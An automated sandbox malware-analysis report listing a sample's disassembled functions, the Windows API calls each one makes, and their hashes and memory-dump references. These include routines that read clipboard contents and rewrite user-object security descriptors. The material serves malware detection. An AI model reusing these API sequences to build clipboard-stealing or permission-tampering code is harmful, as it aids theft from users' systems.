                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                              • Opcode ID: 4648cb5d0a2686e04f89f01b698252d23552b9eacc9b8a27c1b5acadb436908d
                                                                                                                                                                                                                                                                              • Instruction ID: d4bcd350134011977221d4724df9842d30d2c48099d34c2c65a07ba8e7e0ca0d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4648cb5d0a2686e04f89f01b698252d23552b9eacc9b8a27c1b5acadb436908d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF0BE32650E34A79B352A3AAC09F9A3748AF807B0F158021F814DB090EA3CDC0186E0
                                                                                                                                                                                                                                                                              Function 00723B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                              • Opcode ID: 1fb70771514191d194ad67cc2eaca4eb4a8f0505286525d5880714cb615c3386
                                                                                                                                                                                                                                                                              • Instruction ID: 9fe3b4bad650d55867983a30c160807edcff6a00da8043a9173e553c45793fff
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fb70771514191d194ad67cc2eaca4eb4a8f0505286525d5880714cb615c3386
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CE06DB1240638E6DB213E7ABC09F9A3A48AF457A0F150161EC15965D1DF7CCE8286E4
                                                                                                                                                                                                                                                                              Function 006F66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: ca48ac9af0871dbc13ec46b3158e09903bcc4ab1c446ef641f5874ae7f9f5255
                                                                                                                                                                                                                                                                              • Instruction ID: 1db6027c460a8b504ffdf6d9601e8733a9e3017aaac95c886f625d0bff007c2c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca48ac9af0871dbc13ec46b3158e09903bcc4ab1c446ef641f5874ae7f9f5255
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63F0A9B0004702DFCB349F64D8A4822BBE2BF04329320893EF2C686610C736A880DF10
                                                                                                                                                                                                                                                                              Function 00746AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                              • Opcode ID: 4245119dfcbcdcdb2265fb2d3102e05dfea7795f400e20df06c334bd58e69d05
                                                                                                                                                                                                                                                                              • Instruction ID: 2ddef8967df729de153a7803be39af3a9fc0c2d9f9106fb2aaf5032f0e472235
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4245119dfcbcdcdb2265fb2d3102e05dfea7795f400e20df06c334bd58e69d05
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F0E5B1B04244EADB309B6498097A6F7E8AB01314F10861ED8D5821C1C7BE54D49B92
                                                                                                                                                                                                                                                                              Function 006F684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                              • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                              • Instruction ID: 9efd1b7415441ebb79bb1eb90731bed52f4c0c19290113b79fb5d58009edf922
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5F0F87550020DFFDF05DF94C941EAEBB79FB04318F208549F9159A151C336EA61ABA1
                                                                                                                                                                                                                                                                              Function 006F3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 006F3963
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                              • Opcode ID: ae4d6aaa1f168ca3e4731b4a33636f40f4f2ea4dbb1245ec16eeae707b10f29a
                                                                                                                                                                                                                                                                              • Instruction ID: eee4f7ab4ba1f3036ccafd1e9a3c8ff1608c9924394a8d58d51d4e5e2c2d723e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4d6aaa1f168ca3e4731b4a33636f40f4f2ea4dbb1245ec16eeae707b10f29a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFF037709143589FE7529F24DC49BD57BBCA701708F0040A9A64896283DB785B89CF95
                                                                                                                                                                                                                                                                              Function 006F3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 006F3A76
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 541455249-0
                                                                                                                                                                                                                                                                              • Opcode ID: 881759d35fa4cc24855c86c851a3cb62b9fb3df3f4c7abf49b6ba6e4f01e26d3
                                                                                                                                                                                                                                                                              • Instruction ID: 7d4061e0522bf02307b408967925402ae16cfa495c919572a3cbec8f04a42921
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 881759d35fa4cc24855c86c851a3cb62b9fb3df3f4c7abf49b6ba6e4f01e26d3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE0C273A002285BCB20A2589C0AFEE77EDEFC87A0F0580B5FD09D7259D964ED808694
                                                                                                                                                                                                                                                                              Function 0073071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00730A84,?,?,00000000,?,00730A84,00000000,0000000C), ref: 00730737
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                                                              • Opcode ID: 862aefab0c5d76596048e05c452c3b3a451d3aba9ef0f99456a859c9b0f2f915
                                                                                                                                                                                                                                                                              • Instruction ID: 18b1a88bf2d1dba6c40c6868ce82b9f6e941b26fba90775001f97d2bc4ff62ee
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 862aefab0c5d76596048e05c452c3b3a451d3aba9ef0f99456a859c9b0f2f915
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3D06C3204010DBBDF128F84DD4AEDA3BAAFB48714F118000BE1896060C736E821AB94
                                                                                                                                                                                                                                                                              Function 0075EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6913b93d5bba2f7c4fc7b78b37c1d94e697af5454e992c6b9a6e6fd50510c45e
                                                                                                                                                                                                                                                                              • Instruction ID: fa94c17f49bf4b165f151004d77e06d187e3cffbfb2b5d683ba82eb194f1de10
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6913b93d5bba2f7c4fc7b78b37c1d94e697af5454e992c6b9a6e6fd50510c45e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8B0923400060005AD2C0A385A099E9330078423B6BEC9BC0F87D852E1C3BD8D8FAA50
                                                                                                                                                                                                                                                                              Function 0076664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DC54: FindFirstFileW.KERNEL32(?,?), ref: 0075DCCB
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0075DD1B
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075DD2C
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DC54: FindClose.KERNEL32(00000000), ref: 0075DD43
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0076666E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                              • Opcode ID: 64bee2ef6c83fed9851c2c42ead1090a505e30f8c95baa29ddd0b8d4756abac0
                                                                                                                                                                                                                                                                              • Instruction ID: 0071684c393de79811ce44d4ae95ecdd74dd85549b6c24d44d93d78cadf75a43
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64bee2ef6c83fed9851c2c42ead1090a505e30f8c95baa29ddd0b8d4756abac0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF082352001148FCB24EF58D445B7EBBE6AF84720F04844DF9058B352CB74BC01CB94

                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                              Function 007514AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00751A60
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A6C
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A7B
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A82
                                                                                                                                                                                                                                                                                • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00751A99
                                                                                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00751518
                                                                                                                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0075154C
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00751563
                                                                                                                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0075159D
                                                                                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007515B9
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 007515D0
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007515D8
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007515DF
                                                                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00751600
                                                                                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00751607
                                                                                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00751636
                                                                                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00751658
                                                                                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0075166A
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00751691
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00751698
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007516A1
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007516A8
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007516B1
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007516B8
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007516C4
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007516CB
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: GetProcessHeap.KERNEL32(00000008,007514FD,?,00000000,?,007514FD,?), ref: 00751AED
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007514FD,?), ref: 00751AF4
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007514FD,?), ref: 00751B03
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                              • Opcode ID: 581432e5abd627431a7a85408fc9d31d5ad10860b6ae97a6e21f00eea1c57861
                                                                                                                                                                                                                                                                              • Instruction ID: 7cbcb1e9f3a522575805e3bd588638a0c31404dae03116f9658978dc24b0bf60
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 581432e5abd627431a7a85408fc9d31d5ad10860b6ae97a6e21f00eea1c57861
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A717DB1900209ABDF10DFA4DC48FEEBBB8FF04342F588515E915A6190DB799D09CBA4
                                                                                                                                                                                                                                                                              Function 0076F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • OpenClipboard.USER32(0078DCD0), ref: 0076F586
                                                                                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0076F594
                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0076F5A0
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0076F5AC
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0076F5E4
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0076F5EE
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0076F619
                                                                                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0076F626
                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0076F62E
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0076F63F
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0076F67F
                                                                                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0076F695
                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000F), ref: 0076F6A1
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0076F6B2
                                                                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0076F6D4
                                                                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0076F6F1
                                                                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0076F72F
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0076F750
                                                                                                                                                                                                                                                                              • CountClipboardFormats.USER32 ref: 0076F771
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0076F7B6
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
